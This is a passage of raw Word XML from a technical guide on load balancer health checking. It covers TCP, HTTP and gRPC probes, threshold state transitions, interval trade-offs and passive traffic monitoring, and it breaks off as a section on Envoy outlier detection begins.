      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="32731059">
          <v:rect id="_x0000_i2675" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F57510" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Health Checking — The Brain of the Load Balancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B98E1B1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Active Health Checks — Detailed Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33173F4F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP health check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE484DB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB attempts TCP connection to backend on configured port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C98027" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If 3-way handshake completes → healthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674633A7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>If connection refused or times out → unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B38858F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="297"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Doesn't verify the application is working (process might accept connections but return errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1268640B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP health check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D2AA1A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="298"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB sends HTTP request: GET /health HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D47273" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="298"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Expects: HTTP 200 response within timeout (e.g., 5 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3778CC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="298"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>May check response body (e.g., must contain "status": "ok").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71220DD6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="298"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Verifies the entire application stack is functioning (web server + application logic + potentially dependencies).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4279C1E1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC health check:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540FA762" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Uses the standard gRPC Health Checking Protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779541DA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB calls grpc.health.v1.Health/Check.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340C2D93" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="299"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Response is SERVING, NOT_SERVING, or UNKNOWN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523D3119" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Health check state machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10917DFA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389A96E5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                   ┌──────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9B9613" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                   │      HEALTHY         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D92A4B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                   │   (serving traffic)  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3885D1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                   └──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75728574" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4576ADE0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                    N consecutive failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F9323A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                    (e.g., 3 failures)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1708E2B1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AED7173" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                              </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122617C1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                   ┌──────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A0BD2" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                   │     UNHEALTHY        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315466C9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                   │  (removed from pool) │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF7EB4A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                   └──────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0A272F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8E23D8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                    M consecutive successes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B01F35B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                    (e.g., 2 successes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E1B463" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D21AFF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                              </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04628B19" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                   ┌──────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537EE51E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                   │      HEALTHY         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4628A217" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                   │   (back in pool)     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDF1F4E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t xml:space="preserve">                   └──────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC0A9BC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why thresholds matter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733C6630" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="300"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failure threshold (N=3):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Prevents a single dropped packet from removing a healthy server. But adds detection delay: with 10-second intervals, detection takes 30 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2937EB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="300"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Success threshold (M=2):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Prevents flapping. A server that responds once isn't necessarily stable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B533593" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The interval × threshold tradeoff:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1229"/>
        <w:gridCol w:w="2188"/>
        <w:gridCol w:w="1982"/>
        <w:gridCol w:w="3951"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="4C0B06B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3AFDF9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F15BD1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Interval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2E34CB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F15BD1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Failure Threshold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AC0278" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F15BD1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Detection 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E7B4AC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F15BD1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>False Positive Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="6AEE46D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0DB1AF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>2s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66758B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">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B82FB6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>6s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0B2744" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Higher (network blips trigger removal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="5F83F90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20E971" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>10s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A88292" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>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A5F1CF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>30s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3A52B7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Lower (more tolerant)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w14:paraId="2EFE474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F50AAF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>5s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A7BB8F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">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D32A93" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>25s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152A23" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
            <w:r w:rsidRPr="00F15BD1">
              <w:t>Very low (very conservative)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C020C7E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Passive Health Checks (Real Traffic Monitoring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A62E78" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73516C43" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Instead of sending synthetic probes, the LB monitors actual request/response traffic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B328CC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>Track success/failure of real requests to each backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1530E7AA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If error rate exceeds threshold (e.g., &gt;50% of requests in a 10-second window return 5xx), mark unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10341829" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="301"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>After a cooldown period, gradually reintroduce traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398FA799" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages over active checks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571D7617" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Detects application-level failures that synthetic health checks miss (e.g., the /health endpoint works but /api/orders is broken due to a specific code path).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20484492" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>No additional probe traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7B6451" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Responds faster (detects failure from actual traffic, not waiting for next probe interval).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC431A6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Can't detect failures on a server receiving no traffic (new server, low-traffic server).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B165F4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Best practice:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Use BOTH active + passive together. Active catches "server is completely dead." Passive catches "server is partially broken."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A10168" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 Outlier Detection (Envoy's Approach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBFBC5D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>More sophisticated than simple threshold:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AA08FF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="303"/>
        </w:numPr>
